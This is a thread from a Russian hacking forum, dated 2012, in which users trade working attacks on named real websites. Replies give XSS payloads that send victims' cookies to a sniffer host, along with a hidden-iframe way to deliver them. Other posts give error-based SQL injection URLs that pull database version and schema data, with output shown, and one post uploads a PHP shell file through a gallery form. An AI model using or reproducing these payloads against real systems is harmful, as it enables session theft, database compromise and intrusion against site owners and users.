HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19481  
Старый 03.02.2012, 16:04
Serrg
Guest
Сообщений: n/a
Провел на форуме:
28040

Репутация: 13
По умолчанию

Здараствуйте, подскажите пожалуйста.. Нашел

http://vsetke.ru/registration/registration_form.jsp

xss При вставке в поля имя и пароль

">alert(/xss/)

Подскажи как можно вытащить куки ?
 
Ответить с цитированием

  #19482  
Старый 03.02.2012, 16:21
bodrich
Guest
Сообщений: n/a
Провел на форуме:
5709

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://www.poezia.ru/article.php?sid=65755+union+select+1--
Количество столбцов 1, но почему ошибку все равно выдает ?
 
Ответить с цитированием

  #19483  
Старый 03.02.2012, 16:25
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

Цитата:
Сообщение от bodrich  
bodrich said:
Количество столбцов 1, но почему ошибку все равно выдает ?
попробуй вывод в ошибке, там походу нет вывода столбцов вот так крути

http://www.poezia.ru/article.php?sid=65755+and(select+count(*)+from+inf ormation_schema.tables+group+by(concat(version(),0 x00,floor(rand(0)*2))))--+
 
Ответить с цитированием

  #19484  
Старый 03.02.2012, 16:27
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от bodrich  
bodrich said:
Количество столбцов 1, но почему ошибку все равно выдает ?
Код:
Code:
http://www.poezia.ru/article.php?sid=65755+and(select+1+from(select+count(*),concat((select+version()),0x00,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Код:
Code:
Duplicate entry '5.0.27' for key 1
Код:
Code:
http://www.poezia.ru/article.php?sid=65755+and(select+1+from(select+count(*),concat((select+concat(table_name,0x3a,column_name,0x00)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Код:
Code:
Duplicate entry 'CHARACTER_SETS:CHARACTER_SET_NAME' for key 1
 
Ответить с цитированием

  #19485  
Старый 03.02.2012, 16:42
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от pirat0  
pirat0 said:
">javascript:src=http://'sniffer.com?'+document.cookie;"
как-то так вроде помнится))
Код:
Code:
img = new Image(); img.src = "http://sniffer?"+document.cookie;
location.href = "http://sniffer?" + document.cookie;
 
Ответить с цитированием

  #19486  
Старый 03.02.2012, 16:43
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]">(new Image()).src='http://site.com/sniffer.php?'+document.cookie[/COLOR][/COLOR] 
Можно отправлять GET-запросом

Цитата:
Сообщение от None  
http://vsetke.ru/registration/registration_form.jsp?email_address=">(new Image()).src='http://site.com/sniffer.php?'%2bdocument.cookie
Вставляешь на свой сайт скрытый фрейм

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"](new Image()).src='http://site.com/sniffer.php?'&#43document.cookie"[/COLOR][COLOR="#007700"]>[/COLOR][/COLOR] 
Когда юзер зайдет на сайт, куки отправятся на сниффер. В IE и хроме этот вариант не сработает из-за фильтров.

p.s.:

В этом примере используется GET-запрос, потому что реализация атаки проще. Но если есть возможность, лучше использовать POST-запрос для эксплуатации XSS.
 
Ответить с цитированием

  #19487  
Старый 03.02.2012, 16:46
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от bodrich  
bodrich said:
Количество столбцов 1, но почему ошибку все равно выдает ?
Потому что несколько запросов к базе. В первом один столбец, во втором больше.
 
Ответить с цитированием

  #19488  
Старый 03.02.2012, 17:47
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

что можно сделать в подобном случае?

Цитата:
Сообщение от None  
http://www.bluegrassmidwest.com/details.php?id=2+or+1+group+by+concat%28%28select+ version%28%29%29,floor%28rand%280%29*2%29%29having +min%280%29+or+1--+
ответ

error setting cookie
 
Ответить с цитированием

  #19489  
Старый 03.02.2012, 18:08
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

[CODE]
Code:
POSTDATA =-----------------------------114782935826962
Content-Disposition: form-data; name="f[id]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[galery_id]"

1565
-----------------------------114782935826962
Content-Disposition: form-data; name="f[order_id]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_ru]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_en]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_ua]"

-----------------------------114782935826962
Content-Disposition: form-data; name="f[img_small]"; filename=""
Content-Type: application/octet-stream

-----------------------------114782935826962
Content-Disposition: form-data; name="f[img_big]"; filename="d00m.php"
Content-Type: unknown/unknown
 
Ответить с цитированием

  #19490  
Старый 03.02.2012, 19:25
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
что можно сделать в подобном случае?
ответ
error setting cookie
http://www.bluegrassmidwest.com/details.php?id=6'and(0)/*--*/order/*--*/by/*--*/10/*)

вот столбцы можно подобрать, но потом как только вставляеш в запрос union все валится, походу какой то фильтр, UNiOn такого типа тоже не канает((, может еще у кого какие идеи будут??
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ